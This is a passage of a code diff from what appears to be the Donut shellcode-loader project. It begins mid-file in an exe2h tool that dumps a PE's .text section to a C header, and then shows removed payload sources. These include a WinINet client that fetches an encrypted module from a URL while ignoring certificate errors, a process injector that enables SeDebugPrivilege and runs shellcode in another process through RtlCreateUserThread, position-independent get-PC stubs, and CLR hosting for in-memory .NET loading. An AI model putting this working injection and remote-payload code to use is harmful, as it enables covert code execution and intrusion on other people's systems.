96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 /**
192 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
193 char label[32], file[32], *str;
194 uint32_t i;
195 uint32_t *p=(uint32_t*)bin;
196 FILE *fd;
197
198 memset(label, 0, sizeof(label));
199 memset(file, 0, sizeof(file));
200
201 #if defined(WINDOWS)
202 str = PathFindFileName(fname);
203 #else
204 str = basename(fname);
205 #endif
206 for(i=0; str[i] != 0 && i < 16;i++) {
207 if(str[i] == '.') {
208 file[i] = label[i] = '_';
209 } else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214
215 strcat(file, ".h");
216
217 fd = fopen(file, "wb");
218
219 if(fd != NULL) {
220 // align up by 4
221 len = (len & -4) + 4;
222 len >>= 2;
223
224 // declare the array
225 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
226
227 // initialize array
228 for(i=0; i<len; i++) {
229 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
230 }
231 fclose(fd);
232 printf(" [ Saved array to %s\n", file);
233 } else printf(" [ unable to create file : %s\n", file);
234 }
235 */
236 // structure of COFF (.obj) file
237
238 //--------------------------//
239 // IMAGE_FILE_HEADER //
240 //--------------------------//
241 // IMAGE_SECTION_HEADER //
242 // * num sections //
243 //--------------------------//
244 // //
245 // //
246 // //
247 // section data //
248 // * num sections //
249 // //
250 // //
251 //--------------------------//
252 // IMAGE_SYMBOL //
253 // * num symbols //
254 //--------------------------//
255 // string table //
256 //--------------------------//
257
258 int main (int argc, char *argv[]) {
259 int fd, i;
260 struct stat fs;
261 uint8_t *map, *cs;
262 PIMAGE_SECTION_HEADER sh;
263 //PIMAGE_FILE_HEADER fh;
264 //PIMAGE_COFF_SYMBOLS_HEADER csh;
265 uint32_t ofs, len;
266
267 if (argc != 2) {
268 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
269 return 0;
270 }
271
272 // open file for reading
273 fd = open(argv[1], O_RDONLY);
274
275 if(fd == 0) {
276 printf(" [ unable to open %s\n", argv[1]);
277 return 0;
278 }
279 // if file has some data
280 if(fstat(fd, &fs) == 0) {
281 // map into memory
282 map = (uint8_t*)mmap(NULL, fs.st_size,
283 PROT_READ, MAP_PRIVATE, fd, 0);
284 if(map != NULL) {
285 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
286 printf(" [ Found valid DOS and NT header.\n");
287 // get the .text section
288 sh = SecHdr(map);
289 // if a section header was returned
290 if(sh != NULL) {
291 printf(" [ Locating .text section.\n");
292 // locate the .text section
293 for(i=0; i<SecSize(map); i++) {
294 if(strcmp((char*)sh[i].Name, ".text") == 0) {
295 ofs = rva2ofs(map, sh[i].VirtualAddress);
296
297 if(ofs != -1) {
298 cs = (map + ofs);
299 len = sh[i].Misc.VirtualSize;
300 // convert to header file
301 bin2h(map, argv[1], cs, len);
302 break;
303 }
304 }
305 }
306 }
307 } else {
308 printf(" [ No valid DOS or NT header found.\n");
309 // treat file as binary
310 bin2h(NULL, argv[1], map, fs.st_size);
311 //bin2array(NULL, argv[1], map, fs.st_size);
312 }
313 munmap(map, fs.st_size);
314 }
315 }
316 close(fd);
317 return 0;
318 }
payload/exe2h/exe2h.obj less more
Binary diff not shown
+0
-74
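--- a/payload/exe2h/mmap-windows.c
+++ b/payload/exe2h/mmap-windows.c
@@ -1,74 +0,0 @@
-/* mmap() replacement for Windows
-*
-* Author: Mike Frysinger <[email protected]>
-* Placed into the public domain
-*/
-
-/* References:
-* CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
-* CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
-* MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
-* UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
-*/
-
-#include "mmap.h"
-
-void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
-{
-if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
-return MAP_FAILED;
-if (fd == -1) {
-if (!(flags & MAP_ANON) || offset)
-return MAP_FAILED;
-} else if (flags & MAP_ANON)
-return MAP_FAILED;
-
-DWORD flProtect;
-if (prot & PROT_WRITE) {
-if (prot & PROT_EXEC)
-flProtect = PAGE_EXECUTE_READWRITE;
-else
-flProtect = PAGE_READWRITE;
-} else if (prot & PROT_EXEC) {
-if (prot & PROT_READ)
-flProtect = PAGE_EXECUTE_READ;
-else if (prot & PROT_EXEC)
-flProtect = PAGE_EXECUTE;
-} else
-flProtect = PAGE_READONLY;
-
-off_t end = length + offset;
-HANDLE mmap_fd, h;
-if (fd == -1)
-mmap_fd = INVALID_HANDLE_VALUE;
-else
-mmap_fd = (HANDLE)_get_osfhandle(fd);
-h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
-if (h == NULL)
-return MAP_FAILED;
-
-DWORD dwDesiredAccess;
-if (prot & PROT_WRITE)
-dwDesiredAccess = FILE_MAP_WRITE;
-else
-dwDesiredAccess = FILE_MAP_READ;
-if (prot & PROT_EXEC)
-dwDesiredAccess |= FILE_MAP_EXECUTE;
-if (flags & MAP_PRIVATE)
-dwDesiredAccess |= FILE_MAP_COPY;
-void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
-if (ret == NULL) {
-CloseHandle(h);
-ret = MAP_FAILED;
-}
-return ret;
-}
-
-void munmap(void *addr, size_t length)
-{
-UnmapViewOfFile(addr);
-/* ruh-ro, we leaked handle from CreateFileMapping() ... */
-}
-
-#undef DWORD_HI
-#undef DWORD_LO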
payload/exe2h/mmap-windows.obj less more
Binary diff not shown
+0
-45
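--- a/payload/exe2h/mmap.h
+++ b/payload/exe2h/mmap.h
@@ -1,45 +0,0 @@
-
-
-#ifndef MMAP_H
-#define MMAP_H
-
-#include <io.h>
-#include <windows.h>
-#include <sys/types.h>
-
-#define PROT_READ 0x1
-#define PROT_WRITE 0x2
-/* This flag is only available in WinXP+ */
-#ifdef FILE_MAP_EXECUTE
-#define PROT_EXEC 0x4
-#else
-#define PROT_EXEC 0x0
-#define FILE_MAP_EXECUTE 0
-#endif
-
-#define MAP_SHARED 0x01
-#define MAP_PRIVATE 0x02
-#define MAP_ANONYMOUS 0x20
-#define MAP_ANON MAP_ANONYMOUS
-#define MAP_FAILED ((void *) -1)
-
-#ifdef __USE_FILE_OFFSET64
-# define DWORD_HI(x) (x >> 32)
-# define DWORD_LO(x) ((x) & 0xffffffff)
-#else
-# define DWORD_HI(x) (0)
-# define DWORD_LO(x) (x)
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
-void munmap(void *addr, size_t length);
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif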
+0
-61
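--- a/payload/getpc.c
+++ b/payload/getpc.c
@@ -1,61 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// Function to return the program counter.
-// Always place this at the end of payload.
-// Tested with x86 build of MSVC 2019 and MinGW. YMMV.
-#if defined(_MSC_VER)
-#if defined(_M_IX86)
-__declspec(naked) char *get_pc(void) {
-__asm {
-call pc_addr
-pc_addr:
-pop eax
-sub eax, 5
-ret
-}
-}
-#endif
-#elif defined(__GNUC__)
-#if defined(__i386__)
-asm (
-".global get_pc\n"
-".global _get_pc\n"
-"_get_pc:\n"
-"get_pc:\n"
-" call pc_addr\n"
-"pc_addr:\n"
-" pop %eax\n"
-" sub $5, %eax\n"
-" ret\n"
-);
-#endif
-#endif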
+0
-198
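--- a/payload/http_client.c
+++ b/payload/http_client.c
@@ -1,198 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-BOOL DownloadModule(PDONUT_INSTANCE inst) {
-HINTERNET hin, con, req;
-PBYTE buf;
-DWORD s, n, rd, len, code=0;
-BOOL bResult = FALSE, bSecure = FALSE;
-URL_COMPONENTS uc;
-CHAR host[DONUT_MAX_URL],
-file[DONUT_MAX_URL];
-
-// default flags for HTTP client
-DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
-INTERNET_FLAG_NO_CACHE_WRITE |
-INTERNET_FLAG_NO_UI |
-INTERNET_FLAG_RELOAD |
-INTERNET_FLAG_NO_AUTO_REDIRECT;
-
-Memset(&uc, 0, sizeof(uc));
-
-uc.dwStructSize = sizeof(uc);
-uc.lpszHostName = host;
-uc.lpszUrlPath = file;
-uc.dwHostNameLength = DONUT_MAX_URL;
-uc.dwUrlPathLength = DONUT_MAX_URL;
-
-DPRINT("Decoding URL %s", inst->http.url);
-
-if(!inst->api.InternetCrackUrl(
-inst->http.url, 0, ICU_DECODE, &uc)) {
-return FALSE;
-}
-
-bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
-
-// if secure connection, update the flags to ignore
-// invalid certificates
-if(bSecure) {
-flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
-INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
-INTERNET_FLAG_SECURE;
-}
-
-DPRINT("Initializing WININET");
-
-hin = inst->api.InternetOpen(
-NULL, INTERNET_OPEN_TYPE_PRECONFIG,
-NULL, NULL, 0);
-
-if(hin == NULL) return FALSE;
-
-DPRINT("Creating %s connection for %s",
-bSecure ? "HTTPS" : "HTTP", host);
-
-con = inst->api.InternetConnect(
-hin, host,
-bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
-NULL, NULL,
-INTERNET_SERVICE_HTTP, 0, 0);
-
-if(con != NULL) {
-DPRINT("Creating HTTP %s request for %s",
-inst->http.req, file);
-
-req = inst->api.HttpOpenRequest(
-con, inst->http.req,
-file, NULL, NULL, NULL, flags, 0);
-
-if(req != NULL) {
-
-// see if we should ignore invalid certificates for this request
-if(bSecure) {
-if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
-n = sizeof (s);
-
-s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
-SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
-SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
-SECURITY_FLAG_IGNORE_WRONG_USAGE |
-SECURITY_FLAG_IGNORE_REVOCATION;
-
-DPRINT("Setting option to ignore invalid certificates");
-
-inst->api.InternetSetOption(
-req,
-INTERNET_OPTION_SECURITY_FLAGS,
-&s,
-sizeof(s));
-}
-}
-DPRINT("Sending request");
-
-if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
-len = sizeof(DWORD);
-code = 0;
-DPRINT("Querying status code");
-
-if(inst->api.HttpQueryInfo(
-req,
-HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
-&code, &len, 0))
-{
-DPRINT("Code is %ld", code);
-
-if(code == HTTP_STATUS_OK) {
-DPRINT("Querying content length");
-
-len = sizeof(SIZE_T);
-inst->mod_len = 0;
-
-if(inst->api.HttpQueryInfo(
-req,
-HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
-&inst->mod_len, &len, 0))
-{
-if(inst->mod_len != 0) {
-DPRINT("Allocating memory for module");
-
-inst->module.p = inst->api.VirtualAlloc(
-NULL, inst->mod_len,
-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-if(inst->module.p != NULL) {
-rd = 0;
-DPRINT("Downloading module into memory");
-bResult = inst->api.InternetReadFile(
-req,
-inst->module.p,
-inst->mod_len, &rd);
-}
-}
-}
-}
-}
-}
-DPRINT("Closing request handle");
-inst->api.InternetCloseHandle(req);
-}
-DPRINT("Closing HTTP connection");
-inst->api.InternetCloseHandle(con);
-}
-DPRINT("Closing internet handle");
-inst->api.InternetCloseHandle(hin);
-
-#if !defined(NOCRYPTO)
-if(bResult) {
-PDONUT_MODULE mod = inst->module.p;
-
-DPRINT("Decrypting %lli bytes of module", inst->mod_len);
-
-donut_decrypt(inst->mod_key.mk,
-inst->mod_key.ctr,
-mod,
-inst->mod_len);
-
-DPRINT("Generating hash to verify decryption");
-ULONG64 mac = maru(inst->sig, inst->iv);
-
-DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
-
-if(mac != mod->mac) {
-DPRINT("Decryption failed");
-return FALSE;
-}
-}
-#endif
-return bResult;
-}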
+0
-235
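--- a/payload/inject.c
+++ b/payload/inject.c
@@ -1,235 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include <Windows.h>
-#include <stdio.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "advapi32.lib")
-#pragma comment(lib, "shell32.lib")
-#pragma comment(lib, "user32.lib")
-
-typedef struct _CLIENT_ID {
-PVOID UniqueProcess;
-PVOID UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
-IN HANDLE ProcessHandle,
-IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
-IN BOOLEAN CreateSuspended,
-IN ULONG StackZeroBits,
-IN OUT PULONG StackReserved,
-IN OUT PULONG StackCommit,
-IN PVOID StartAddress,
-IN PVOID StartParameter OPTIONAL,
-OUT PHANDLE ThreadHandle,
-OUT PCLIENT_ID ClientID);
-
-BOOL EnablePrivilege(PCHAR szPrivilege){
-HANDLE hToken;
-BOOL bResult;
-LUID luid;
-TOKEN_PRIVILEGES tp;
-
-// open token for current process
-bResult = OpenProcessToken(GetCurrentProcess(),
-TOKEN_ADJUST_PRIVILEGES, &hToken);
-
-if(!bResult) return FALSE;
-
-// lookup privilege
-bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
-if(bResult){
-tp.PrivilegeCount = 1;
-tp.Privileges[0].Luid = luid;
-tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-
-// adjust token
-bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
-}
-CloseHandle(hToken);
-return bResult;
-}
-
-// display error message for last error code
-VOID xstrerror (PCHAR fmt, ...){
-PCHAR error=NULL;
-va_list arglist;
-CHAR buffer[1024];
-DWORD dwError=GetLastError();
-
-va_start(arglist, fmt);
-vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
-va_end (arglist);
-
-if (FormatMessage (
-FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
-NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-(LPSTR)&error, 0, NULL))
-{
-printf(" [ %s : %s\n", buffer, error);
-LocalFree (error);
-} else {
-printf(" [ %s error : %08lX\n", buffer, dwError);
-}
-}
-
-DWORD name2pid(PCHAR procName){
-HANDLE hSnap;
-PROCESSENTRY32 pe32;
-DWORD pid=0;
-
-// create snapshot of system
-hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
-if(hSnap == INVALID_HANDLE_VALUE) return 0;
-
-pe32.dwSize = sizeof(PROCESSENTRY32);
-
-// get first process
-if(Process32First(hSnap, &pe32)){
-do {
-if(!lstrcmpi(pe32.szExeFile, procName)){
-pid=pe32.th32ProcessID;
-break;
-}
-} while(Process32Next(hSnap, &pe32));
-}
-CloseHandle(hSnap);
-return pid;
-}
-
-BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
-SIZE_T wr;
-HANDLE hp,ht;
-LPVOID cs;
-RtlCreateUserThread_t pRtlCreateUserThread;
-HMODULE hn;
-CLIENT_ID cid;
-NTSTATUS nt=~0UL;
-DWORD t;
-
-// 1. resolve API address
-hn = GetModuleHandle("ntdll.dll");
-pRtlCreateUserThread=(RtlCreateUserThread_t)
-GetProcAddress(hn, "RtlCreateUserThread");
-
-printf(" [ opening process %li\n", id);
-// 2. open the target process
-hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
-
-if(hp == NULL) return FALSE;
-
-// 3. allocate executable-read-write (XRW) memory for payload
-printf(" [ allocating memory for payload.\n");
-cs=VirtualAllocEx(hp, NULL, codeLen,
-MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-
-printf(" [ writing code to %p.\n", cs);
-// 4. copy the payload to remote memory
-WriteProcessMemory(hp, cs, code, codeLen, &wr);
-VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
-
-printf(" [ press any key to continue.\n");
-getchar();
-
-// 5. execute payload in remote process
-printf(" [ creating new thread.\n");
-nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
-NULL, cs, NULL, &ht, &cid);
-
-printf(" [ nt status is %lx\n", nt);
-WaitForSingleObject(ht, INFINITE);
-
-// 6. close remote thread handle
-CloseHandle(ht);
-
-// 7. free remote memory
-printf(" [ freeing memory.\n");
-VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
-
-// 8. close remote process handle
-CloseHandle(hp);
-return nt == 0; // STATUS_SUCCESS
-}
-
-DWORD getdata(PCHAR path, LPVOID *data){
-HANDLE hf;
-DWORD len,rd=0;
-
-// 1. open the file
-hf=CreateFile(path, GENERIC_READ, 0, 0,
-OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-
-if(hf!=INVALID_HANDLE_VALUE){
-// get file size
-len=GetFileSize(hf, 0);
-// allocate memory
-*data=malloc(len + 16);
-// read file contents into memory
-ReadFile(hf, *data, len, &rd, 0);
-CloseHandle(hf);
-}
-return rd;
-}
-
-int main(int argc, char *argv[]){
-LPVOID code;
-SIZE_T code_len;
-DWORD pid;
-
-if (argc != 3){
-printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
-return 0;
-}
-
-if(!EnablePrivilege(SE_DEBUG_NAME)) {
-printf(" [ cannot enable SeDebugPrivilege.\n");
-}
-
-// get pid
-pid=atoi(argv[1]);
-if(pid==0) pid=name2pid(argv[1]);
-
-if(pid==0) {
-printf(" [ unable to obtain process id.\n");
-return 0;
-}
-// pic
-code_len = getdata(argv[2], &code);
-if(code_len == 0) {
-printf(" [ unable to read payload.\n");
-return 0;
-}
-injectPIC(pid, code, code_len);
-free(code);
-return 0;
-}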
+0
-364
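--- a/payload/inmem_dotnet.c
+++ b/payload/inmem_dotnet.c
@@ -1,364 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
-PDONUT_MODULE mod;
-HRESULT hr = S_OK;
-BSTR domain;
-SAFEARRAYBOUND sab;
-SAFEARRAY *sa;
-DWORD i;
-BOOL loaded=FALSE, loadable;
-PBYTE p;
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-if(inst->api.CLRCreateInstance != NULL) {
-DPRINT("CLRCreateInstance");
-
-hr = inst->api.CLRCreateInstance(
-(REFCLSID)&inst->xCLSID_CLRMetaHost,
-(REFIID)&inst->xIID_ICLRMetaHost,
-(LPVOID*)&pa->icmh);
-
-if(SUCCEEDED(hr)) {
-DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);
-
-hr = pa->icmh->lpVtbl->GetRuntime(
-pa->icmh, mod->runtime,
-(REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
-
-if(SUCCEEDED(hr)) {
-DPRINT("ICLRRuntimeInfo::IsLoadable");
-hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
-
-if(SUCCEEDED(hr) && loadable) {
-DPRINT("ICLRRuntimeInfo::GetInterface");
-
-hr = pa->icri->lpVtbl->GetInterface(
-pa->icri,
-(REFCLSID)&inst->xCLSID_CorRuntimeHost,
-(REFIID)&inst->xIID_ICorRuntimeHost,
-(LPVOID)&pa->icrh);
-
-DPRINT("HRESULT: %08lx", hr);
-}
-} else pa->icri = NULL;
-} else pa->icmh = NULL;
-}
-if(FAILED(hr)) {
-DPRINT("CorBindToRuntime");
-
-hr = inst->api.CorBindToRuntime(
-NULL, // load whatever's available
-NULL, // load workstation build
-&inst->xCLSID_CorRuntimeHost,
-&inst->xIID_ICorRuntimeHost,
-(LPVOID*)&pa->icrh);
-
-DPRINT("HRESULT: %08lx", hr);
-}
-
-if(FAILED(hr)) {
-pa->icrh = NULL;
-return FALSE;
-}
-DPRINT("ICorRuntimeHost::Start");
-
-hr = pa->icrh->lpVtbl->Start(pa->icrh);
-
-if(SUCCEEDED(hr)) {
-domain = inst->api.SysAllocString(mod->domain);
-
-DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);
-
-hr = pa->icrh->lpVtbl->CreateDomain(
-pa->icrh, domain, NULL, &pa->iu);
-
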